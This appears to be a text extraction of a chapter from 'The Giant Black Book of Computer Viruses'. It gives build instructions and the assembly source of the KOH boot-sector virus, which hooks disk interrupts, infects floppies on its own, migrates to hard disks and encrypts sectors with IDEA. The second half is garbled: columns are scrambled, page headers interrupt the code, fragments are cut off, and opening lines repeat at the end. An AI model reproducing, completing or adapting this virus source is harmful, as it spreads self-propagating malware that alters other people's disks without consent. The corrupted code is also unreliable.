Legal Warning As of the date of this writing, the KOH virus is illegal to export in executable form from the US. If you create an executable of it from the code in this book, and export it, you could be subject to immediate confiscation of all your property without recourse, and possibly also to jail after a trial. There is, however, no restriction (at present) against exporting this code in printed form, as in this book. The KOH Source KOH consists of several modules which must all be present on the disk to assemble it properly. KOH.ASM is the main file, which includes the loader, the boot sector, the interrupt handlers, hard disk encryptor, etc. KOHIDEA.ASM is an include file that contains the code for the IDEA algorithm. FATMAN.ASM is the FAT manager routines. These differ slightly from the FATMAN.ASM originally listed with the BBS virus because the FAT is sometimes encrypted. The PASS.ASM include file contains the pass phrase entry rou- tines, and RAND.ASM contains the pseudo-random number gen- erator. To build the KOH virus, just assemble KOH.ASM, preferably using TASM. Then, run the KOH.COM file you produce to infect and encrypt a diskette in the A: drive (or specify B: on the command line if you’d rather use your B: drive). To migrate KOH to the hard disk, just boot from the infected floppy. KOH will ask if you want it to migrate to the hard disk; just answer yes. When you assemble KOH, make sure the code does not overrun the scratchpad buffer where the disk is read into and written from. If you do, it will cause KOH to crash. Since KOH is highly optimized and crunched into the minimum amount of space avai- able to it, an assembler that did not optimize the assembly could cause code to overflow into this buffer, which is located just below the boot sector. The KOH.ASM Source ;Source Listing for the Potassium Hydroxide virus. ; (C) 1995 by The King of Hearts, All rights reserved. ;Licensed to American Eagle Publications, Inc. for use in The Giant Black Book ;of Computer Viruses ; ;Version 1.00 ; Initial release - beta only ;Version 1.01 ; Upgrade to fix a number of bugs in 1.00, gets rid of casual encryption ; and encrypts only one partition on disk, not whole disk, instant HD ; password change. ;Version 1.02 ; Fixes failure of SETUP_HARD on some disks because the INT 41H vector ; doesn’t always point to a proper drive parameter table. ; Fixes problem with some floppy drives that messes up 2nd FAT table. ;Version 1.03 ; Fixes inability to infect some floppy disks that are almost full but not ; quite. ;Both of the following should always be odd for this to work right. BUF_SIZE EQU 9 ;Internal disk buffer size, in sectors VIR_SIZE EQU 9 ;Virus size, less boot sector, in sectors VIRUS SEGMENT BYTE ASSUME CS:VIRUS,DS:VIRUS,ES:VIRUS,SS:VIRUS ORG 100H ;******************************************************************************* ;* VIRUS LOADER FOR A DISK IN DRIVE A: * ;******************************************************************************* START: mov ah,9 mov dx,OFFSET WELCOME_MSG int 21H xor ax,ax mov ds,ax mov si,13H*4 ;save the old int 13H vector mov di,OFFSET OLD_13H movsw movsw mov ax,OFFSET INT_13H ;and set up new interrupt 13H mov bx,13H*4 ;which everybody will have to mov ds:[bx],ax ;use from now on mov ax,es mov ds:[bx+2],ax push cs pop ds ;restore ds to here call ENCRYPT_STRINGS mov [HPP],OFFSET FDHPP ;floppy password call MASTER_PASS ;create a new password mov bx,80H ;check parameter mov al,[bx] cmp al,2 jc PAR1 ;no parameter, assume a: drive mov al,[bx+2] ;else get first letter or al,20H ;make it lower case cmp al,61H jc PAR1 ;must be “a” or “b”, else exit cmp al,63H jnc PAR1 sub al,61H ;subtract “a” mov dl,al ;and put drive letter here add BYTE PTR [SUCCESS_MSG+17],al jmp SHORT PAR2 PAR1: mov dl,0 PAR2: mov ax,0201H mov bx,OFFSET DUMMY_BUF mov cx,1 mov dh,0 int 13H jnc SUCCESS_LOAD cmp ah,6 je SUCCESS_LOAD ABORT_LOAD: mov dx,OFFSET ABORT_MSG mov ah,9 int 21H jmp SHORT EXIT_NOW SUCCESS_LOAD: mov dx,OFFSET SUCCESS_MSG mov ah,9 int 21H EXIT_NOW: xor ax,ax mov ds,ax mov ax,WORD PTR es:[OLD_13H] ;restore old interrupt 13H mov bx,13H*4 mov ds:[bx],ax mov ax,WORD PTR es:[OLD_13H+2] mov ds:[bx+2],ax mov ax,4C00H int 21H ;This routine encrypts all strings in the virus ENCRYPT_STRINGS: mov bx,OFFSET STRING_LIST ENCLP: push bx mov si,[bx] or si,si jz ESTREND call ENCRYPT_STRING pop bx add bx,2 jmp ENCLP ESTREND:pop bx ret ;This routine encrypts a string in the virus ENCRYPT_STRING: mov [RAND_SEED],si ES1: call GET_RANDOM mov al,[si] xor [si],ah inc si or al,al jnz ES1 ESEX: ret ABORT_MSG DB ’Initial load failed aborting.$’ SUCCESS_MSG DB ’Load successful. A: now encrypted with KOH.$’ STRING_LIST DW OFFSET SURE DW OFFSET ENCRYPT_QUERY1 DW OFFSET PW_EXPLAIN DW OFFSET STOP_MSG DW OFFSET FD_PWASK DW OFFSET HD_PWCHASK DW OFFSET FD_PWCHASK DW OFFSET PW_HDEX DW OFFSET HARD_ASK DW OFFSET ENC_PASS1 DW OFFSET DEC_PASS DW OFFSET ENC_PASS2 DW OFFSET BAD_PASS DW OFFSET ALL_DONE DW OFFSET NO_ROOM DW OFFSET UPDATE_MSG DW OFFSET CYL_LABEL DW OFFSET HD_LABEL DW 0 DUMMY_BUF DB 512 dup (?) ;******************************************************************************* ;* BIOS DATA AREA * ;******************************************************************************* ORG 413H MEMSIZE DW 640 ;size of memory installed, in KB WELCOME_MSG DB ’Potassium Hydroxide (KOH) Version 1.03 Loader by the King of Hearts’,0DH,0AH DB ’(C) 1995 American Eagle Publications, Inc. All rights reserved.’,0DH,0AH,0AH DB ’This loader will migrate the KOH encryption system to a floppy disk of your’,0DH,0AH DB ’choice (A or B) as specified on the command line. Af- ter encrypting, you must’,0DH,0AH DB ’boot from that floppy to activate the decryption, or to migrate to a hard disk.’,0DH,0AH DB ’This program uses the IDEA algorithm (implementation not developed in the US)’,0DH,0AH DB ’in conjunction with a pass phrase up to 128 bytes long. Floppies and hard disks’,0DH,0AH DB ’have their own separate pass phrases. The floppy uses it directly. The hard’,0DH,0AH DB ’disk is encrypted with a 16 byte random number, which is decrypted with its’,0DH,0AH DB ’pass phrase. Three commands can be activated when KOH is resident:’,0DH,0AH,0DH,0AH DB ’ Ctrl-Alt-K allows one to change the pass phrases, floppy and hard disk.’,0DH,0AH,0AH DB ’ Ctrl-Alt-O toggles floppy auto-migrate. When turned on, a “+” is displayed’,0DH,0AH DB ’ and KOH will automatically encrypt every floppy it sees. When’,0DH,0AH DB ’ turned off a “-” is displayed, and floppies are not touched.’,0DH,0AH,0AH DB ’ Ctrl-Alt-H uninstalls KOH from the disk that was booted from.’,0DH,0AH,0AH DB ’For more info see KOH.DOC!’,0DH,0AH,0AH,’$’ ;******************************************************************************* ;* VIRUS CODE STARTS HERE * ;******************************************************************************* ORG 7C00H - 512*VIR_SIZE - 512*BUF_SIZE - 48 LOCAL_STACK: FDHPP DB 16 dup (0) ;floppy disk hashed pass phrase HDKEY DB 16 dup (0) ;hard disk key, used to encrypt/decrypt sectors HDHPP DB 16 dup (0) ;hard disk hashed pass phrase, to encrypt HDKEY ORG 7C00H - 512*VIR_SIZE - 512*BUF_SIZE IDEAVIR: ;A label for the beginning of the virus ;******************************************************************************* ;* INTERRUPT 13H HANDLER * ;******************************************************************************* ;This routine must intercept reads and writes to the floppy disk and encrypt/ ;decrypt them as necessary. OLD_13H DD ? ;Old interrupt 13H vector goes here OLD_9 DD ? ;Old interrupt 9 vector goes here ;The following calls the original rom bios INT 13. DO_INT13 just calls it once. ;DO_INT13E does error handling, calling it once, and if an error, doing a ;disk reset, and then calling it again, returning c if there is an error. DO_INT13E: push ax pushf call DWORD PTR cs:[OLD_13H] jc DI132 add sp,2 ;exit now if 1st call was ok ret DI132: mov ah,0 ;1st call bad, reset & try again pushf call DWORD PTR cs:[OLD_13H] pop ax DO_INT13: ;bare call entry point pushf call DWORD PTR cs:[OLD_13H] ret INT_13H: sti cmp ah,2 ;we want to intercept reads jz READ_FUNCTION cmp ah,3 ;and writes to all disks jz WRITE_FUNCTION cmp ah,5 ;if a FORMAT function is called jnz I131 ;set a flag mov BYTE PTR cs:[FORMAT_FLAG],1 jmp SHORT I13R I131: cmp ah,16H ;likewise for change-line check jnz I13R mov BYTE PTR cs:[MOTOR_FLAG],1 I13R: jmp DWORD PTR cs:[OLD_13H] ;******************************************************************************* ;This section of code handles all attempts to access the Disk BIOS Function 3, ;(Write). If an attempt is made to write any sectors except the boot sector, ;this function must encrypt the data to write, write it, and then decrypt ;everything again. If the boot sector is written, it must not be encrypted! WRITE_FUNCTION: mov BYTE PTR cs:[ACTIVE],1 mov cs:[CURR_DISK],dl ;set this with current disk no mov cs:[SECS_READ],al call IS_ENCRYPTED jz WF1 cmp dx,80H ;write protect the virus here jnz WF0 cmp cx,VIR_SIZE+4 jc WF3 WF0: call ENCRYPT_DATA WF1: call DO_INT13 pushf call IS_ENCRYPTED jz WF2 call DECRYPT_DATA WF2: popf WF3: mov BYTE PTR cs:[ACTIVE],0 retf 2 ;return and pop flags off stack ;******************************************************************************* ;This section of code handles all attempts to access the Disk BIOS Function 2, ;(Read). If an attempt is made to read any sectors except the boot sector, ;this function must allow the read to proceed normally, and then decrypt ;everything read except the boot sector. READ_FUNCTION: mov BYTE PTR cs:[ACTIVE],1 mov cs:[SECS_READ],al mov cs:[CURR_DISK],dl ;set this with current disk no mov cs:[OLD_SS],ss mov cs:[OLD_SP],sp cli push cs pop ss mov sp,OFFSET LOCAL_STACK sti cmp dl,80H ;skip infect for hard drives jnc DO_READ call INFECT_FLOPPY cmp BYTE PTR cs:[CHANGE_FLAG],0 ;was change flag set in IN- FECT_FLOPPY? jz DO_READ ;no, continue with read mov BYTE PTR cs:[CHANGE_FLAG],0 ;yes, reset flag mov ax,600H ;set ah=6, al=0, c on stc pushf ;and exit now jmp SHORT DONE_DECRYPT DO_READ: call DO_INT13 pushf jnc DOREAD1 ;exit on error cmp ah,11H jz DOREAD1 or al,al jz DONE_DECRYPT mov cs:[SECS_READ],al DOREAD1:call IS_ENCRYPTED ;is disk encrypted? jz DONE_DECRYPT ;no, don’t try to decrypt it call DECRYPT_DATA DONE_DECRYPT: popf cli mov ss,cs:[OLD_SS] mov sp,cs:[OLD_SP] sti jmp WF3 ;return and pop flags off stack ;This routine determines if CURR_DISK is encrypted or not. It returns with ;Z set if it isn’t encrypted, and reset if it is. It is assumed that dl ;contains the current disk # on entry. No registers are changed. IS_ENCRYPTED: cmp dl,80H ;is it a hard drive? jnc IE_HD ;yes, check it specially push cx push ax cmp BYTE PTR cs:[FORMAT_FLAG],1 jz IEE mov cl,dl mov al,cs:[CRYPT_FLAG] shr al,cl and al,1 IEE: pop ax pop cx ret IE_HD: jnz IEZ ;drive other than c: ? push ax mov al,cs:[HD_CRYPT] ;see if HD is encrypted or al,al ;and set flag properly jz IEHDE push cx push dx ;see if we’re in right partition push ds push cs pop ds call DECODE_SECTOR cmp cx,[FIRST_CYL] jc IEZ2 ;cx<first cyl, exit with z set jne IEH2 cmp dh,[FIRST_HEAD] jc IEZ2 ;cx=first cyl, dh<first head, exit z jne IEH2 cmp dl,[FIRST_SEC] jc IEZ2 ;cx=1st cyl, dh=1st head, dl<1st sec IEH2: cmp cx,[LAST_CYL] jg IEZ2 ;cx>last cyl, exit with z set jne IEH3 cmp dh,[LAST_HEAD] jg IEZ2 ;cx=last cyl, dh>last head jne IEH3 cmp dl,[LAST_SEC] jg IEZ2 ;cx=last cyl, dh=last head, dl>last sec mov al,1 ;all ok, we’re encrypted or al,al IEH3: pop ds pop dx pop cx IEHDE: pop ax ret IEZ2: pop ds pop dx pop cx pop ax IEZ: push ax ;return with Z set xor al,al pop ax ret ;This routine decrypts using IDEA. On entry, ax, es:bx, cx and dx must be set ;up just like they are for the INT 13. All registers are preserved on this ;call. This routine does not change the stack. DECRYPT_DATA: mov BYTE PTR cs:[cfb_dc_idea],0FFH jmp SHORT CRYPT_DATA ;This routine encrypts using IDEA. On entry, ax, es:bx, cx and dx must be set ;up just like they are for the INT 13. All registers are preserved on this ;call. This routine does not change the stack. ENCRYPT_DATA: mov BYTE PTR cs:[cfb_dc_idea],0 CRYPT_DATA: cld push ds push es push di ;save everything now push si push dx push cx push bx push ax push cs pop ds mov al,[SECS_READ] mov [HPP],OFFSET FDHPP cmp dl,80H jc ED1 mov [HPP],OFFSET HDKEY call SET_HARD ED1: or dh,dh ;is it head 0? jnz ED2 ;nope, go encrypt cmp cx,1 ;is it track 0, sector 1? jz ED3 ;nope, go encrypt ED2: cmp dl,80H jc STRONG_CRYPT cmp dh,[BSLOC_DH] jnz STRONG_CRYPT cmp cx,[BSLOC_CX] jnz STRONG_CRYPT ED3: inc cl dec al add bx,512 STRONG_CRYPT: xor dl,dl or al,al jz WR_EN2 mov si,bx WR_EN1: push ax mov [IV],dx mov [IV+2],cx xor ax,ax mov [IV+4],ax mov [IV+6],ax push dx push cx push si call initkey_idea pop si push si push si call ideasec pop si pop cx pop dx pop ax cmp BYTE PTR [CURR_DISK],80H jnc WR_EN15 inc cl ;on floppies, we just inc cl jmp SHORT WR_EN17 WR_EN15:call NEXT_SEC ;on HD, reads can jump hds and trks jnc WR_EN2 ;done with disk, exit WR_EN17:add si,512 dec al ;loop until everything is en- crypted jnz WR_EN1 WR_EN2: ;restore registers pop ax pop bx pop cx pop dx pop si pop di pop es pop ds ret ;This routine increments cx/dx to the next sector. On floppies, it just incre ;increments cl, the sector number. On HD’s, it must also handle head and track ;number. This includes the AMI extension to handle more than 1024 cylinders. ;Returns nc if it is past the last sector on disk. NEXT_SEC: push cx and cl,00111111B inc cx cmp cl,BYTE PTR [SECS_PER_TRACK] pop cx jg NS1 inc cl jmp SHORT NEXT_SEC_EXIT NS1: and cl,11000000B inc cl push dx and dh,00111111B inc dh cmp dh,BYTE PTR [HEADS] pop dx jge NS2 inc dh jmp SHORT NEXT_SEC_EXIT NS2: and dh,11000000B add ch,1 jnc NEXT_SEC_EXIT add cl,64 jnc NEXT_SEC_EXIT add dh,64 NEXT_SEC_EXIT: cmp BYTE PTR [CURR_DISK],80H jc FLOPPY_EX push cx push dx call DECODE_SECTOR cmp cx,[LAST_CYL] jne NSE cmp dh,[LAST_HEAD] jne NSE cmp dl,[LAST_SEC] jne NSE stc ;ok if dl=last sector NSE: pop dx pop cx ret FLOPPY_EX: cmp ch,BYTE PTR [TRACKS] ;set c if ch < TRACKS ret ;This routine does all that is needed to infect a floppy disk. It determines ;whether the disk is infected, and if so, attempts an infect. INFECT_FLOPPY: push ds push es push di ;save everything now push si push dx push cx push bx push ax mov ax,cs mov ds,ax mov es,ax mov ax,WORD PTR [DR_FLAG] push ax mov ax,WORD PTR [BS_SECS_PER_TRACK] push ax mov ax,WORD PTR [BS_HEADS] push ax mov ax,WORD PTR [BS_SECTORS_ON_DISK] push ax xor ax,ax ;set drive flag = 0 for any mov WORD PTR [DR_FLAG],ax ;floppies infected mov [HPP],OFFSET FDHPP ;use floppy password call SHOULD_INFECT ;should we infect the floppy? jnz IF_END mov cl,dl ;get current disk number mov al,0FEH rol al,cl ;assume we’re not encrypted now, and [CRYPT_FLAG],al ;so reset the crypt flag mov ax,0201H ;move boot sector into SCRATCH- BUF mov bx,OFFSET SCRATCHBUF mov cx,1 mov dh,0 int 40H ;read boot sector jnc INF2 ;read was ok cmp ah,6 ;change flag set if ah=6 jnz INF1 mov [CHANGE_FLAG],ah ;so save it here INF1: mov ax,0201H int 40H ;try again jc IF_END INF2: mov bx,OFFSET SCRATCHBUF+200H ;now read first fat sector inc cx mov ax,201H int 40H mov al,BYTE PTR [SCRATCHBUF+15H] ;get boot sector ID xor al,BYTE PTR [SCRATCHBUF+200H] ;xor with FAT ID jnz INF5 ;not same, encrypted, so skip cmp WORD PTR [SCRATCHBUF+201H],0FFFFH ;better be FFFF jnz INF5 ;else encrypted cmp [FD_INFECT],1 ;should we infect?? jz INF55 ;nope, don’t encrypt call INIT_FAT_MANAGER ;set up disk parameters call ENCRYPT_FLOPPY ;and encrypt the disk jc IF_END ;if error, exit and don’t infect mov ax,0201H ;re-load boot sec after encrypt mov cx,1 mov dh,0 mov dl,[CURR_DISK] mov bx,OFFSET SCRATCHBUF call DO_INT13 jc IF_END ;exit if an error (shouldn’t be) INF5: call SET_CRYPT_FLAG ;now encrypted, set this flag INF55: cmp [FD_INFECT],1 jz IF_END call IS_VBS ;is viral boot sector there? jnz INF6 ;nope, go infect it jmp SHORT IF_END ;else exit INF6: call INIT_FAT_MANAGER ;initialize disk parameters call MOVE_VIRUS_FLOPPY ;and infect, if possible IF_END: pop ax mov WORD PTR [BS_SECTORS_ON_DISK],ax pop ax mov WORD PTR [BS_HEADS],ax pop ax mov WORD PTR [BS_SECS_PER_TRACK],ax pop ax mov WORD PTR [DR_FLAG],ax pop ax pop bx pop cx pop dx [...]... bytes of boot sector + 3ADH ;to viral boot sector at end ;so boot works right on 618 The Giant Black Book of Computer Viruses rep movsb ;floppies too pop call mov cx CLUST_TO_ABSOLUTE ;set cx,dx up with trk, sec, hd info WORD PTR [VIRCX - OFFSET BOOT_START + OFFSET SCRATCHBUF + mov BYTE PTR [VIRDH - OFFSET BOOT_START + OFFSET SCRATCHBUF + ;save in viral bs BYTE PTR [CHANGE_FLAG - OFFSET BOOT_START + OFFSET... PTR [REMOVE],0FFH mov [HPP],OFFSET HDKEY call EHD_SUBR ;decrypt the hard disk(s) mov BYTE PTR [REMOVE],0 HUR: cld mov di,OFFSET INT_13H ;reroute interrupts call KILL_INT ;back to old handlers mov ax,OFFSET OLD_13H stosw mov di,OFFSET INT_9 call KILL_INT mov ax,OFFSET OLD_9 stosw mov si,OFFSET ALL_DONE ;all done, say so call DISP_STRING 624 The Giant Black Book of Computer Viruses jmp KBEX ;configuration... beginning of disk ;copies of fat on disk ;number of entries in root directory ;total number of sectors on disk ;disk format ID ;number of sectors per FAT ;number of sectors per track (one head) ;number of heads on disk ;The following are the CX and DH values to indicate where the rest of the ;virus is located These are set by INFECT_FLOPPY, as needed by INT 13H VIRCX DW ? VIRDH DB ? HPP DW OFFSET FDHPP...614 The Giant Black Book of Computer Viruses pop pop pop pop ret si di es ds ;return with flags set properly ;Set the CRYPT_FLAG for the current disk SET_CRYPT_FLAG: mov cl,[CURR_DISK] mov al,1 shl al,cl or [CRYPT_FLAG],al ret ;if we get here, drive is encrypted ;so set flag accordingly ;This routine determines whether we should infect now It signals time to ;infect only if the drive motor is off If the. .. one sector of encryption for hard disk This preserves all registers ax bx cx dx si 616 ; ; ; ; ; ; ; The Giant Black Book of Computer Viruses mov call call push mov call mov call pop mov xor call mov int pop pop pop pop pop ret si,OFFSET CYL_LABEL DISP_STRING DECODE_SECTOR dx ax,cx DISP_DECIMAL si,OFFSET HD_LABEL DISP_STRING dx al,dh ah,ah DISP_DECIMAL ax,0E0DH 10H si dx cx bx ax ;Display the decimal... HDHPP ax,239BH di,OFFSET IV ax ax ;only place this gets used ;set up IV to some misc number 622 The Giant Black Book of Computer Viruses inc stosw call mov push call ret ax initkey_idea si,OFFSET SCRATCHBUF si ideasec ;encrypt the buffer ;This routine installs interrupt 9 and 13 handlers INSTALL_INT_HANDLERS: xor ax,ax mov ds,ax mov si,9*4 mov di,OFFSET OLD_9 movsw movsw mov si,13H*4 ;save the old int 13H... BOOT: cli xor ax,ax mov ss,ax mov ds,ax mov es,ax mov sp,OFFSET BOOT_START sti mov mov cl,6 ax,[MEMSIZE] ;first cyl, hd, sec of ;active partition ;last cyl, hd, sec of ;active partition ;interrupts off ;set up segment registers ;and stack pointer ;prep to convert kb’s to seg ;get size of memory available 628 The Giant Black Book of Computer Viruses shl sub mov sub GO_RELOC: mov mov mov rep push mov... above, the fact that this routine sets cx=0 ;is important IS_HARD_THERE: push ds xor cx,cx mov ds,cx mov bx,475H ;Get hard disk count from bios mov al,[bx] ;put it in al 630 The Giant Black Book of Computer Viruses pop or ret ds al,al ;and see if al=0 (no drives) ;******************************************************************************* ;Determine whether the boot sector in SCRATCHBUF is the viral... in memory 0=not there TRACKS DW ? ;number of tracks on disk ;The following must be set prior to calling INIT_FAT_MANAGER or using any of ;these routines CURR_DISK DB ? ;current disk drive ;This routine is passed the number of contiguous free sectors desired in bx, ;and it attempts to locate them on the disk If it can, it returns the FAT ;entry number in cx, and the C flag reset If there aren’t that... bits 1st ;and move them down ;for even entries, just AND low 12 bits ;if offset=511, we cross a sec boundary ;if not exit, ;else fake as if it is occupied 638 The Giant Black Book of Computer Viruses ;This routine reads the FAT sector number requested in al The first is 1, ;second is 2, etc It updates the CURR_FAT_SEC variable once the sector has ;been successfully loaded GET_FAT_SECTOR: inc ax ;inc al . Listing for the Potassium Hydroxide virus. ; (C) 1995 by The King of Hearts, All rights reserved. ;Licensed to American Eagle Publications, Inc. for use in The Giant Black Book ;of Computer Viruses ; ;Version. DW OFFSET SURE DW OFFSET ENCRYPT_QUERY1 DW OFFSET PW_EXPLAIN DW OFFSET STOP_MSG DW OFFSET FD_PWASK DW OFFSET HD_PWCHASK DW OFFSET FD_PWCHASK DW OFFSET PW_HDEX DW OFFSET HARD_ASK DW OFFSET. Legal Warning As of the date of this writing, the KOH virus is illegal to export in executable form from the US. If you create an executable of it from the code in this book, and export it,